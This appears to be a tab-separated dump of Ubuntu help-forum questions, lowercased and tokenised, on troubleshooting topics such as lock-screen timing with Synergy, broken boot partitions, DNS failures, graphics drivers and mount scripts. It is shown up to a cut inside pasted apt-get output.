465721	synergy and ubuntu lock screen problem on ubuntu 12.04	i have a setup on work with a ubuntu 12.04 and a windows 7 pc which share same keyboard and same mouse via synergy . on ubuntu the synergy server is running , on the windows 7 the synergy client is running . if i come back from my lunch break and the mouse focus is on my windows 7 screen . i see that for a fraction of a second the ubuntu screen is n't locked properbly i can see the whole desktop . it is possible to type something in a bash terminal on the ubuntu screen . then after that fraction of a second the screen is locked and a password is required . i think this is a security problem . how can i fix that ? is this a known problem on ubuntu 12.04 ?
465722	how does the kernel load firmware ?	recently i 've been struggling to get a wifi card to work properly ( bcm43228 ) , and had a few related questions . questions are all related to the same subject , so imo it makes sense to make only one post . does it suffice to copy a .o firmware into /lib/firmware for it to be loaded into the right device ? ( or is udev setup necessary ? or is it done by a module ? ) when does the actual firmware load into the device occur - immediately or after next [ cold ] reboot ? when a new kernel is installed , is there some cleaning done at the module/firmware level ? ( in order to have some device running , one may have to blacklist some modules , install specific other ones ... while a newer kernel may fix all the devices problem , and that extra setup , blacklisting and extra module may become unnecessary , or even undesired ... ) finally is it a good idea to perform a fresh install from time to time , instead of doing the usual upgrade ( still related to devices ) ?
465723	can not access my computer	i have use ubuntu over seval years , and then i altered lightdm.conf in /etc/lightdm , and now i can not access my computer it hang after crypto , and i tried from tty enter : sudo apt-get update sudo apt-get install -- reinstall ubuntu-desktop and i also tried enter : sudo apt-get install gdm and can still not access my comptuer , and when i boot from usb stick i can not alter my lightdm , and when there is show a lock on the drive it seam lock , and can someone please help .
465725	can i install ubuntu14.04 in my ideapad ?	i 'm using ubuntu 12.04 64 bit version in my lenovo s100 ideapad . my ideapad is having 2gb ram and atom processor.is there any performance and speed problems will occur if i change my os to 14.04 ?
465727	activate chrome native notifications	i 'm trying to get native notifications to work using google chrome ( or chromium ) on ubuntu , but no luck so far . things i 've tried already : libnotify notifications in chrome i 've runned install.sh too ( and a restart of chrome ) : $ ./install.sh native messaging host com.initiated.chrome_libnotify_notifications has been installed . linux native notification chromify-osd and i remember i 've tried another extension as well but i do n't remember its name . none of them work . i keep getting the normal notifications of chrome itself . i 'm using google chrome 34.0.1847.137 on ubuntu 14.04 x64 . can someone tell me how to get this working ?
465728	xubuntu 14.04 panel unhide trigger area	i would like to know if it is posssible to trigger the panel to apear before touching the corner . currently , i have the hide option on , but i have to go all the way to the edge to touch it for the panel to aprear . would it be possible to let it apear once i am 1 cm from the edge . thank you ,
465729	ping : unknown host google.com in ubuntu server	i use ubuntu server 12.10 . why if i try : ping google.com ping bitbucket.org or any other website i have : ping : unknown host google.com ping : unknown host bitbucket.org edit : ping 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . 64 bytes from 8.8.8.8 : icmp_req=1 ttl=47 time=6.01 ms 64 bytes from 8.8.8.8 : icmp_req=2 ttl=47 time=5.99 ms 64 bytes from 8.8.8.8 : icmp_req=3 ttl=47 time=5.99 ms 64 bytes from 8.8.8.8 : icmp_req=4 ttl=47 time=5.98 ms nano /etc/resolv.conf is empty file
465732	apt-get autoremove `` before uninstall , this module version was active on this kernel ''	when running apt-get autoremove ( or dry run with -s switch ) , what does the following message mean ? status : before uninstall , this module version was active on this kernel . and what should i do to diagnose if this is going to be a problem ? edit : i 'm on 13.10 but i think this question is version agnostic ?
465733	configuring psad to work under ubuntu 14.04 desktop ( unity ) with visual notification ?	i 'm trying to configure psad under ubuntu unity desktop 14.04 64-bit , the problem is , i don not know how to set these parameters : supports multiple email addresses ( as a comma separated list ) . email_addresses root @ localhost ; machine hostname hostname changeme ; cuz i have no idea why there 's no fqdn under the desktop version of ubuntu ? please help . thanks .
465735	can not play mkv 1080p video in vlc , video is distorted	i am trying to play a 1080p mkv video with vlc and i am getting distorted video image . that is , like it 's drawing a 30 % of the image ( from the top ) and the remaining segment is distorted . when opening the file in banshee media player the video is just fine . what can i do about this ?
465740	broken /boot partition : input/output error	the problem the issue i am facing is that i get the following error on boot , after i select ubuntu in grub : error : file `` /vmlinuz-3.13.0-24-generic.efi.signed '' not found . unaligned pointer 0xd0a26c68 aborted . press any key to exit . i already posted a question regarding this issue here , but as a lot of things changed , i set up this question . my setup i had some different troubles to play around if during installation , as i have a setup with a fully encrypted root . plus , there were issues with the uefi and gpt , especially to get everything work with windows . as the install was a long time ago , i do n't remember any details . on my ubuntu harddrive , i have three main partitions : /dev/sda1 : fat32 , boot flag . this should be the efi partition ( /boot/efi , is n't it ? ) /dev/sda2 : ext2 should be /boot /dev/sda3 : crypt-luks the encrypted container , contains root and swap troubleshooting in a live system i started from a usb , i found the following issues : error in nautilus clicking on the mounted boot-partition ( /dev/sda2 ) in nautilus gives the following error : sorry , could not display all the contents of “boot” : error when getting information for file '/media/ujosh/root/boot/system.map-3.11.0-17-generic ' : input/output error error updating initramfs nevertheless , i could mount all three partitions and bring them together via mount -- bind in the right constellation so i could chroot into my system . there , i ran apt-get update apt-get dist-upgrade everything worked as expected until update-initramfs : generating /boot/initrd.img-3.13.0-24-generic cat : /proc/cmdline : no such file or directory gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-3.13.0-24-generic with 1. dpkg : error processing package initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : linux-image-3.13.0-24-generic grub-efi-amd64 grub-efi-amd64-signed linux-image-extra-3.13.0-24-generic linux-signed-image-3.13.0-24-generic linux-signed-image-generic linux-signed-generic initramfs-tools e : sub-process /usr/bin/dpkg returned an error code ( 1 ) boot-repair does n't help i as well ran boot-repair on the setup , which eventually triggered the same errors while updating the initramfs as above . running file system checks by the help of @ zoid , i used the following tests on my /boot-partition : enter code here sudo fsck.ext2 -p -f -c0 /dev/sda2 /dev/sda2 : inode 29 has illegal block ( s ) . /dev/sda2 : unexpected inconsistency ; run fsck manually . ( i.e. , without -a or -p options ) sudo fsck.ext2 -f -c0 /dev/sda2 results pasted here sudo smartctl -h /dev/sda smartctl 6.2 2013-07-26 r3841 [ x86_64-linux-3.13.0-24-generic ] ( local build ) copyright ( c ) 2002-13 , bruce allen , christian franke , www.smartmontools.org === start of read smart data section === smart overall-health self-assessment test result : passed sudo smartctl -a /dev/sda smartctl 6.2 2013-07-26 r3841 [ x86_64-linux-3.13.0-24-generic ] ( local build ) copyright ( c ) 2002-13 , bruce allen , christian franke , www.smartmontools.org === start of read smart data section === smart attributes data structure revision number : 1 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 5 reallocated_sector_ct 0x0033 100 100 010 pre-fail always - 0 9 power_on_hours 0x0032 099 099 000 old_age always - 2869 12 power_cycle_count 0x0032 098 098 000 old_age always - 1836 177 wear_leveling_count 0x0013 098 098 000 pre-fail always - 48 179 used_rsvd_blk_cnt_tot 0x0013 100 100 010 pre-fail always - 0 181 program_fail_cnt_total 0x0032 100 100 010 old_age always - 0 182 erase_fail_count_total 0x0032 100 100 010 old_age always - 0 183 runtime_bad_block 0x0013 100 100 010 pre-fail always - 0 187 uncorrectable_error_cnt 0x0032 100 100 000 old_age always - 0 190 airflow_temperature_cel 0x0032 062 050 000 old_age always - 38 195 ecc_error_rate 0x001a 200 200 000 old_age always - 0 199 crc_error_count 0x003e 253 253 000 old_age always - 0 235 por_recovery_count 0x0012 099 099 000 old_age always - 128 241 total_lbas_written 0x0032 099 099 000 old_age always - 6450810314 my question how to recover my /boot-partition ? i think that it 's broken is causing the whole issue . what is wrong with my /boot-partition and how could this happen ? my whole productive os is broken and i would like to know how to avoid this in the future . any help is highly appreciated !
465746	what is my actual motherboard ?	ubuntu reports in dmesg : dmi : hewlett-packard hp prodesk 490 g1 mt/18eb , bios l02 v02.01 09/22/2013 but i can not find information about this motherboard anywhere . whatever tool i 'd use i wouldnăźt get any more details from what the kernel reports . i do know what is my hardware ( read the quoted text ) . i simply do n't know anything more than the bare name . i would like to know , for example , the chipset brand/model and other mb-related stuff . how can i know details about the mb i am using without opening the case ? is there anyone knowing anything about it ?
465749	autorun windows share mount script after login as root	i have looked everywhere for a solution that lets me run cifs automount script after login with around 20 second delay . what i have tried . added the script to visudo : rait all= ( all ) nopasswd : /home/rait/downloads/testing/mount.sh , /bin/mount after that added the script to startup applications , but it does not work . also i tried adding it to .bash_profile and rc.d . in rc.d it works but that does not run it after login . i need it after login because it will ask people for their ad user and password via gui . the script itself looks like this : # ! /bin/bash mountdir=public dirname=avalik domain=domain server=server_adr share=shares if [ ! -d $ { home } /documents/ $ { dirname } ] ; then mkdir $ { home } /documents/ $ { dirname } fi # get the windows username wusername=`zenity -- entry -- width=300 -- title= '' mount $ mountdir '' -- text= '' kasutaja nimi : '' ` if [ $ ? -ne 0 ] ; then exit 1 fi # get the windows password wpassword=`zenity -- entry -- width=300 -- title= '' mount $ mountdir '' -- text= '' parool : '' -- hide-text` if [ $ ? -ne 0 ] ; then exit 1 fi mount -t cifs // $ server/ $ share $ { home } /documents/ $ { dirname } -o username= $ { wusern ame } , password= $ { wpassword } , domain= $ { domain } if [ $ ? -eq 0 ] ; then zenity -- info -- title= '' mount ok ! '' -- text= '' mount ok ! '' else zenity -- error -- title= '' mount failed ! '' -- text= '' mount failed ! '' fi i hope that someone knows how to do it . ps : after i edited the visudo now it asks for root password after i open terminal . so terminal asks me for sudo password when ever i open it after login . once i remove the line that should run the script in visudo it does not ask for password anymore . please help : )
465751	xubuntu 14.04 & nvidia	just joined the community and about to install xubuntu 14.04 . in my desktop i have an nvidia geforce2 mx400 card which with earlier kernels & xservers worked fine with the legacy 96xx linux drivers . i have failed to get this driver to install in xubuntu in this version ( live ) and previously installed version ( 13.04 ) ... one driver is from nvidia , the other i tried is from mateusz ﾅ「kasik is there any way i can get an nvidia driver to work with this card either legacy or not , or am i consigned to using nouveau ? thanks .
465754	how to disable x11 support in dbus packages ?	i have console application that uses dbus . that does not starting because dbus compiled with x11 support . how to remove it ? i tried to recompile package dbus with -- disable-x11 , but it does not help , probably need more packages to recomple . pulseserver also does not start for this reason . system is ubuntu server 14.04 lts .
465757	partition the hard drive after ubuntu 14.04 installation	i want to know if i can create a partition on my hard disk after installing ubuntu on it . i want to create partition as we do it in windows like d : or e : drives etc . now i have done the installation of ubuntu 13.04 and upgraded it to 14.04 .
465763	how to install the gedit markdown-preview plugin on 14.04 ?	i 've just installed the markdown preview plugin for gedit and i get the following error on the console when i try to activate it in the plugins tab : traceback ( most recent call last ) : file `` /home/aarold/.local/share/gedit/plugins/markdown-preview/init.py '' , line 25 , in import markdown importerror : no module named 'markdown' ( gedit:20735 ) : libpeas-warning ** : error loading plugin 'markdown-preview note that this is not the same question as the other one about gedit since its solution does not work for me . i 've tried setting the loader parameter in my /home/aarold/.local/share/gedit/plugins/markdown-preview.plugin file to python and python3 as well but none of them work . i tried reinstalling the plugin with all possible permutations of options and although it says install was succesful i always get this error . what could be the problem ? i 've checked the .py file and it seems that it can not import markdown . do i need to install some additional python modules ? i 've tried pip install markdown but although it successfully installed markdown i still get the same error .
465765	installed clamtk/av , but is now gone , nowhere on laptop	i 've installed the full clamtk package on my ubuntu 14.10 , updated it and lastly downloaded the latest gui , but after this installation , all dissapeared , not sure why . now i do n't know what else to do , to rectify this . please assist .
465766	problem while change keyboard layout using both shift	i updated from 13.04 to 14.04 a few weeks ago . in 13.04 i was able to change layout pressing l_shift + r_shift in this way : if i press l_shift , and while pressing it , also press r_shift and then release r_shift - layout will change . in 14.04 this is not working : if i press l_shift , and while pressing it , also press r_shift and then release r_shift - layout will not change until i also release l_shift . in case of ctrl + shift , this works fine . if you press shift , then press ctrl and release - layout will change . it works as in 13.04 how to make both shifts behave as in 13.04 ? sorry if it is not clear , do n't know how to explain it
465768	alcatel x230d works in 12.04 and does n't in ub 14.04	i have some troubles to get the alcatel usb modem x230d , works in ub 14.04 . before in ub 12.04 , it works easley , without any problems ; now i’m trying with the gnome-ppp and wvdial , but no results . when with gnome-ppp tells me that the device doesn’t exist
465771	keeping ubuntu dash just for searching installed applications	i appreciate the work on ubuntu unity dash , but i really do n't need all its features . i want to keep it for only searching applications . so , i do n't want to see search filters and the bottom categories . see the screen shot . what should i do for removing them and set it to only search installed applications ?
465776	blank bios screen before grub	the update to ubuntu 14.04 broke down grub2 someway and now my dual boot with windows does not work . windows will not boot . i have ran boot-repair 4 or 5 times and still to no avail . along with the update to 14.04 , the bios ( hp welcome ) screen no longer appears before grub . the monitor stays blank until grub appears . i have a hp pavilion desktop from 2012 . the only thing i can get to work is f2 brings up the diagnostics . no other f keys bring up visible menus , though i think they bring up the menus and i just ca n't see them . i have come to the conclusion that i need to reinstall 13.1 from live usb that i have , however , i ca n't boot from usb because i ca n't see any menus in order to access it . also , upon the last boot-repair , i obviously broke something in grub because the computer now boots to grub-repair . i just want to boot the live usb and repair everything , but i need to find the bios screen again . any help would be greatly appreciated .
465778	gnome ubuntu 14.04 aticonfig : no supported adapters detected ati radeon 6770m	pavilion dv6 it worked previously but i uninstalled the fglrx and tried to reinstall it . i tried installing it via additional drivers as well as the ubuntu amd catalyst install tool as well as downloading it from the amd homepage and building a deb as well as just running the script . i searched the web for a solution for 3 hours now . lspci | grep vga & sudo lshw -c video lspci | grep vga & sudo lshw -c video [ 1 ] 4686 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] whistler [ radeon hd 6730m/6770m/7690m xt ] ( rev ff ) *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:53 memory : c0000000-c03fffff memory : b0000000-bfffffff ioport:6000 ( size=64 ) [ 1 ] + done lspci | grep -- color=auto vga help is much appreciated
465779	convert a directory to vhd file ?	i have a directory that contains thousands of files and folders , i need to copy it to a ubuntu virtual machine in hyper-v , so if i use copy or cloning to will take a lot of time , can i convert this directory to vhd file then attach it to that machine ? is there any way , i do n't need to convert a partition , just that directory . any ?
465781	are there any files stored on my hard drive when i am running the live usb version of ubuntu ?	are there any files stored on my hard drive when i am running the live usb version of ubuntu ? where is web surfing history stored while running live usb ubuntu ?
465783	clientless vpn that redirects to my locally hosted website ?	i have a web based software solution created in php that i wish to host within my network and set up a vpn so users can gain access . this way my site is not visible to the public but my vpn logon will be . does anyone know how i would go about setting up a vpn to only show my site , preferably passing in the log on details so that there is n't a double log in ? also what clientless vpn solution should i use ? preferably free : ) i 'm using ubuntu 12.04 lts . thanks !
465786	on trusty , what is cl program to create desktop configuration file ?	on precise , i used to create a desktop configuration file with my own gui wrapper which called the gnome-desktop-item-edit command line program ( part of the gnome-panel package ) which had the directory ( to create the file in ) and -- create-new as parameters . this had # ! /usr/bin/env xdg-open as the first line . this seems to give problems in trusty . however , i noticed that arronax ( in trusty ) creates these files without that first line . is there a command line program ( to replace gnome-desktop-item-edit ) which will do as arronax does ? ps another question , what should i put as the exec parameter ( in the file ) if it is , for example , bash /opt/universalmediaserver/ums.sh ?
465790	replacing windows xp with ubuntu	i wish to create space on my computer , deleting xp permanently from my harddrive . i have only 2 partitions ! due to the dualboot i installed without knowing exactly what i was getting into ! i can not unmount it and fear there 's no other exit strategy ... i 'd have to uninstall the whole lot again ?
465795	lxde preferences lacks default applications applet	i 've just installed lxde under ubuntu 14.04 and i 'm finding it much more agreeable . one of the few problems is the fact that the network status widget/panel does n't show up . i 've read this is a known problem and that it can be fixed by manually adding the nw-applet to my default applications list . the problem is that there is no default applications tab in my preferences menu . have i missed it or how can i add it back in if it really is missing for some reason ?
465797	why exaile can not read my music folder with special chars ?	i 'm using exaile 0.3.2.2 in ubuntu 12.04 lts . the system language is configured to pt-br.utf8 , so my music folder is called /home/ < login > /măşsica ( notice the ăş ) . when i add this folder to exaile library , it is displayed as /home/ < login > /m % c3 % basica and none of the files is displayed in library . i suppose there is some bug when parsing the folder name , so how can i make exaile correctly read this without renaming the folder nor upgrading the system ?
465799	ubuntu 14.04 with xerox colorqube 9000 series	our campus uses the colorqube 9203 and 9303 from xerox w/accounting turned on . we 've tried everything we can think of and we ca n't seem to print to the unit successfully . we use the following instructions and ppd file , however the problem that we run into is that we can not successfully print using the accounting codes . the job gets sent to the printer , but we always get the `` job was deleted due to invalid or missing accounting codes '' the website and ppd file in question is here : https : //eng.ucmerced.edu/soe/computing/services/s-e-building-public-printer-configuration/printing-to-se-247-from-linux unfortunately their engineering department technical support is at a loss to explain this and has not come back with any response . does anyone have any thoughts as to why this might be and how i can resolve this for our campus ? edit i should also add that everything works fine on the windows side , including the accounting codes that we 're using . our campus does not officially support linux so we do n't have a local resource to question when these things happen .
465801	ubuntu server 12.0.4 x86 not detecting network adapter on virtualbox 4.3	this is the output of lspic -nn 00:00.0 host bridge : intel corporation 440fx - 82441fx pmc [ natoma ] ( rev 02 ) 00:01.0 isa bridge : intel corporation 82371sb piix3 isa [ natoma/triton ii ] 00:01.1 ide interface : intel corporation 82371ab/eb/mb piix4 ide ( rev 01 ) 00:02.0 vga compatible controller : innotek systemberatung gmbh virtualbox graphics adapter 00:03.0 ethernet controller : intel corporation 82540em gigabit ethernet controller ( rev 02 ) 00:04.0 system peripheral : innotek systemberatung gmbh virtualbox guest service 00:05.0 multimedia audio controller : intel corporation 82801aa ac'97 audio controller ( rev 01 ) **00:07.0 bridge : intel corporation 82371ab/eb/mb piix4 acpi ( rev 08 ) ** 00:0d.0 sata controller : intel corporation 82801hm/hem ( ich8m/ich8m-e ) sata controller [ ahci mode ] ( rev 02 ) while obviously my ethernet is detected in the above output . it is not on ifconfig list . here is the output of ifconfig : ubuntu @ ubuntu-virtualbox : ~ $ ifconfig lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:70 errors:0 dropped:0 overruns:0 frame:0 tx packets:70 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:6939 ( 6.9 kb ) tx bytes:6939 ( 6.9 kb ) even if i try ifconfig eth0 up - i get an error : eth0 : error while getting interface flags : no such device
465802	you are not the owner	while upgrading to 14.04 my pc lost power . then i could n't boot at all . i used a flash drive and then ran a check on the file system . now i can see all the files i want to recover even though i ca n't boot to the drive . when i try to copy them to another flash drive it says i do n't have ownership . i tried what i could find in other posts but they did n't work . one was the alt f2 then gksu nautilus but then it just shows me a picture with gears and i ca n't seem to do anything after that . what i need to do ia copy all of my files at the same time to a separate flash drive ... then i will do a clean install of 14.04 .
465805	how to get a list of running programs in lubuntu 14.04	just like in windows where you can see and maybe `` kill '' one of the running programs . how to get such a list ?
465807	how to keep baloo running but with lower ressource consumption ?	good afternoon everybody , i have a question related to baloo . i saw the thread posted on the same forum : how to turn off baloo in kde 4.13 ? i also face the issue of high ressource consumption mentioned everywhere on that post . but unlike the question raised there , i would actually like to keep the search functionalities , so still allow baloo to run ... i have noticed that the process baloo_file_extractor is ok in terms of cpu but seems really greedy in terms of i/o . cpu < 10 % , in top command i/o > 95 % , in iotop command , active 2 seconds out of 3 . the load average of the computer increases ( ~4.8 in top ) as well as the overall cpu usage ( > 95 % according to processor control ) . it causes my laptop to freeze 1 second every 3 seconds . suspending ( stop signal ) 3 processes : baloo_file_extractor baloo_file akonadi_baloo_indexer brings the laptop to a smooth running . is there anyway to reduce the i/0 demand ? cheers
465811	14.04 google chrome audio playback issues	so after about an hour trying to find a solution for this problem , i 've had no luck . the issue : audio playback in google chrome is way too fast/high pitched/choppy . steps i 've taken to try and fix this : website used for the test between firefox/chrome : google music ( music.google.com ) tested other browsers ( firefox ) . audio was fine . went to chrome : //plugins . disabled the adobe flash plugins one by one to test . i have the following plugins installed : and the flash plugins : neither of those worked . additionally , disabled the vlc plugin to test . that did not work . uninstalled/reinstalled alsa and pulseaudio . that did not work . changed sample rate in pulseaudio to 48000 . that did not work . i 'm really at a loss for what the issue is . like i said , the audio in firefox is fine . any suggestions ?
465816	software updater not working correctly	someone else has asked this same question in this post but the answer did not work correctly and i am not allowed to comment on it . my software updater will show an icon on the launcher but when i click on it it will not open . i can right click and click install available updates . if i open it from the dash it works normally . i reinstalled 14.04 and it still does it .
465817	quick way to dump a wordpress database without digging through configuration files ?	i 've got a load of wordpress sites to move around and modify this afternoon . yay . like any good developer , i want to back up things before i hulk-out and break everything . the site 's files are mostly version controlled ( and those that are n't are backed up ) . the database is something else . there are many sites installed on this server so a central dump is n't as useful as i 'd like . i want a site-specific dump . one of the most annoying things about doing this manually is picking out the details from wp-config.php . i wonder if there 's a more easy way to process this file and pass its details onto mysqldump in one command . i have submitted an answer while writing the question but it 's by no means the only way of doing this . if somebody can suggest a better way of handling this , let me know . just be aware that php will allow all sorts of nonsense . anything used here should accept varied but valid php .
465821	problem with notification area and eclipse on ubuntu 14.04	since the last week , i have a problem with the unity notification area on ubuntu 14.04 . when i 'm using eclipse , ( with oracle java 1.7 ) the notification area dissapear and , 1-3 seconds after , reappear . this happens from time to time , specialy when i do a tab change from a jsp file to a java file . on eclipse , this tab change make a menu change , with different menu items . this is a annoying problem , since the windows are constantly changing his size when this happen . when the notification area is ok : http : //i.imgur.com/it4pgk2.png when the notification area is buggy : http : //i.imgur.com/mr8d6ci.png i try to reset unity using dconf reset -f /org/compiz/ and setsid unity ( sorry , no reputation to send the webupd8.org link ) , but this do n't work . i ca n't find any problem like this on google . how can i start to solve this problem ? thank you .
465822	why wo n't the terminal change to my shared folders directory ?	i have tried cd desktop/shared parallels folders/home/downloads , but linux does not recognise these directories , no such directory etc . why ?
465823	seeking a hand-written note-taking app that snycs between pc and ptablet	i 'm seeking a program like xournal but that is able to have a app for the android that can sync via dropbox or their own cloud , like quill . i 'm okay with windows apps that can run under wine .
465825	autologin ubuntu 14.04 desktop session as guest and allow web browser	how can you autologin session as guest ? bonus for if you explain how to limit the guest to only web browser functionality ? ( and save no changes ) i see the thread here ( how to enable guest account automatic login ? ) , however the ubuntu 14 file/settings appear to have changed .
465826	system does n't boot anymore . error : file initrd.img-3.11.0-20-generic not found	by mistake the file initrd.img-3.11.0-20-generic has been deleted in directory /boot . now the system does n't boot anymore . is there a possibility to restore initrd.img-3.11.0-20-generic ? output of blkid from live-cd : ubuntu @ ubuntu : ~ $ sudo blkid /dev/loop0 : type= '' squashfs '' /dev/sda1 : uuid= '' 999feae4-d45b-4cbf-8015-ef5d62d952cd '' type= '' ext2 '' /dev/sda5 : uuid= '' 9k5huw-e2hq-ifin-08zv-jjdd-0mhm-chysv4 '' type= '' lvm2_member '' /dev/sr0 : label= '' ubuntu 14.04 lts amd64 '' type= '' iso9660 '' /dev/mapper/ubuntu -- vg-root : uuid= '' 8cf4d204-bbf8-44e2-a3e4-0f8c618e67ef '' type= '' ext4 '' /dev/mapper/ubuntu -- vg-swap_1 : uuid= '' 6a0999af-2cee-453f-9a01-7c878df6213e '' type= '' swap '' update 29.05.2014 : here 's what i 've entered ( following the recommendations of mniess ) with the system responses : ubuntu @ ubuntu : ~ $ sudo -i root @ ubuntu : ~ # mount /dev/mapper/ubuntu -- vg-root /mnt root @ ubuntu : ~ # mount /dev/sda1 /mnt/boot root @ ubuntu : ~ # for i in dev dev/pts proc sys sys/firmware ; do mount -- bind / $ i /mnt/ $ i ; done root @ ubuntu : ~ # cp /etc/resolv.conf /mnt/etc/resolv.conf root @ ubuntu : ~ # chroot /mnt root @ ubuntu : / # apt-get update system response after command apt-get update : ign http : //extras.ubuntu.com trusty inrelease ign http : //security.ubuntu.com trusty-security inrelease get:1 http : //security.ubuntu.com trusty-security release.gpg [ 933 b ] get:2 http : //extras.ubuntu.com trusty release.gpg [ 72 b ] ign http : //de.archive.ubuntu.com trusty inrelease get:3 http : //security.ubuntu.com trusty-security release [ 58.5 kb ] hit http : //extras.ubuntu.com trusty release ign http : //de.archive.ubuntu.com trusty-updates inrelease ign http : //de.archive.ubuntu.com trusty-backports inrelease ign http : //de.archive.ubuntu.com trusty-proposed inrelease hit http : //de.archive.ubuntu.com trusty release.gpg hit http : //extras.ubuntu.com trusty/main sources get:4 http : //security.ubuntu.com trusty-security/main sources [ 16.0 kb ] get:5 http : //de.archive.ubuntu.com trusty-updates release.gpg [ 933 b ] hit http : //extras.ubuntu.com trusty/main amd64 packages hit http : //extras.ubuntu.com trusty/main i386 packages get:6 http : //de.archive.ubuntu.com trusty-backports release.gpg [ 933 b ] get:7 http : //security.ubuntu.com trusty-security/restricted sources [ 14 b ] get:8 http : //security.ubuntu.com trusty-security/universe sources [ 4,212 b ] get:9 http : //de.archive.ubuntu.com trusty-proposed release.gpg [ 933 b ] get:10 http : //security.ubuntu.com trusty-security/multiverse sources [ 687 b ] hit http : //de.archive.ubuntu.com trusty release get:11 http : //security.ubuntu.com trusty-security/main amd64 packages [ 51.8 kb ] get:12 http : //de.archive.ubuntu.com trusty-updates release [ 58.5 kb ] get:13 http : //security.ubuntu.com trusty-security/restricted amd64 packages [ 14 b ] get:14 http : //security.ubuntu.com trusty-security/universe amd64 packages [ 17.9 kb ] get:15 http : //security.ubuntu.com trusty-security/multiverse amd64 packages [ 1,154 b ] get:16 http : //de.archive.ubuntu.com trusty-backports release [ 58.6 kb ] get:17 http : //security.ubuntu.com trusty-security/main i386 packages [ 49.4 kb ] get:18 http : //security.ubuntu.com trusty-security/restricted i386 packages [ 14 b ] get:19 http : //de.archive.ubuntu.com trusty-proposed release [ 58.5 kb ] get:20 http : //security.ubuntu.com trusty-security/universe i386 packages [ 17.9 kb ] get:21 http : //security.ubuntu.com trusty-security/multiverse i386 packages [ 1,404 b ] hit http : //de.archive.ubuntu.com trusty/main sources ign http : //extras.ubuntu.com trusty/main translation-en_us hit http : //de.archive.ubuntu.com trusty/restricted sources hit http : //de.archive.ubuntu.com trusty/universe sources get:22 http : //security.ubuntu.com trusty-security/main translation-en [ 24.4 kb ] hit http : //de.archive.ubuntu.com trusty/multiverse sources ign http : //extras.ubuntu.com trusty/main translation-en hit http : //de.archive.ubuntu.com trusty/main amd64 packages ign http : //extras.ubuntu.com trusty/main translation-de hit http : //security.ubuntu.com trusty-security/multiverse translation-en hit http : //de.archive.ubuntu.com trusty/restricted amd64 packages hit http : //security.ubuntu.com trusty-security/restricted translation-en hit http : //de.archive.ubuntu.com trusty/universe amd64 packages hit http : //de.archive.ubuntu.com trusty/multiverse amd64 packages get:23 http : //security.ubuntu.com trusty-security/universe translation-en [ 9,065 b ] hit http : //de.archive.ubuntu.com trusty/main i386 packages hit http : //de.archive.ubuntu.com trusty/restricted i386 packages hit http : //de.archive.ubuntu.com trusty/universe i386 packages hit http : //de.archive.ubuntu.com trusty/multiverse i386 packages hit http : //de.archive.ubuntu.com trusty/main translation-en hit http : //de.archive.ubuntu.com trusty/main translation-de hit http : //de.archive.ubuntu.com trusty/multiverse translation-en hit http : //de.archive.ubuntu.com trusty/multiverse translation-de hit http : //de.archive.ubuntu.com trusty/restricted translation-en hit http : //de.archive.ubuntu.com trusty/restricted translation-de hit http : //de.archive.ubuntu.com trusty/universe translation-en hit http : //de.archive.ubuntu.com trusty/universe translation-de get:24 http : //de.archive.ubuntu.com trusty-updates/main sources [ 45.7 kb ] get:25 http : //de.archive.ubuntu.com trusty-updates/restricted sources [ 14 b ] get:26 http : //de.archive.ubuntu.com trusty-updates/universe sources [ 28.2 kb ] ign http : //security.ubuntu.com trusty-security/main translation-en_us get:27 http : //de.archive.ubuntu.com trusty-updates/multiverse sources [ 2,234 b ] ign http : //security.ubuntu.com trusty-security/main translation-de get:28 http : //de.archive.ubuntu.com trusty-updates/main amd64 packages [ 109 kb ] ign http : //security.ubuntu.com trusty-security/multiverse translation-en_us ign http : //security.ubuntu.com trusty-security/multiverse translation-de get:29 http : //de.archive.ubuntu.com trusty-updates/restricted amd64 packages [ 14 b ] ign http : //security.ubuntu.com trusty-security/restricted translation-en_us get:30 http : //de.archive.ubuntu.com trusty-updates/universe amd64 packages [ 74.9 kb ] ign http : //security.ubuntu.com trusty-security/restricted translation-de ign http : //security.ubuntu.com trusty-security/universe translation-en_us get:31 http : //de.archive.ubuntu.com trusty-updates/multiverse amd64 packages [ 7,089 b ] ign http : //security.ubuntu.com trusty-security/universe translation-de get:32 http : //de.archive.ubuntu.com trusty-updates/main i386 packages [ 107 kb ] get:33 http : //de.archive.ubuntu.com trusty-updates/restricted i386 packages [ 14 b ] get:34 http : //de.archive.ubuntu.com trusty-updates/universe i386 packages [ 75.3 kb ] get:35 http : //de.archive.ubuntu.com trusty-updates/multiverse i386 packages [ 7,273 b ] get:36 http : //de.archive.ubuntu.com trusty-updates/main translation-en [ 51.2 kb ] hit http : //de.archive.ubuntu.com trusty-updates/multiverse translation-en hit http : //de.archive.ubuntu.com trusty-updates/restricted translation-en get:37 http : //de.archive.ubuntu.com trusty-updates/universe translation-en [ 33.8 kb ] get:38 http : //de.archive.ubuntu.com trusty-backports/main sources [ 14 b ] get:39 http : //de.archive.ubuntu.com trusty-backports/restricted sources [ 14 b ] get:40 http : //de.archive.ubuntu.com trusty-backports/universe sources [ 4,123 b ] get:41 http : //de.archive.ubuntu.com trusty-backports/multiverse sources [ 768 b ] get:42 http : //de.archive.ubuntu.com trusty-backports/main amd64 packages [ 14 b ] get:43 http : //de.archive.ubuntu.com trusty-backports/restricted amd64 packages [ 14 b ] get:44 http : //de.archive.ubuntu.com trusty-backports/universe amd64 packages [ 4,099 b ] get:45 http : //de.archive.ubuntu.com trusty-backports/multiverse amd64 packages [ 619 b ] get:46 http : //de.archive.ubuntu.com trusty-backports/main i386 packages [ 14 b ] get:47 http : //de.archive.ubuntu.com trusty-backports/restricted i386 packages [ 14 b ] get:48 http : 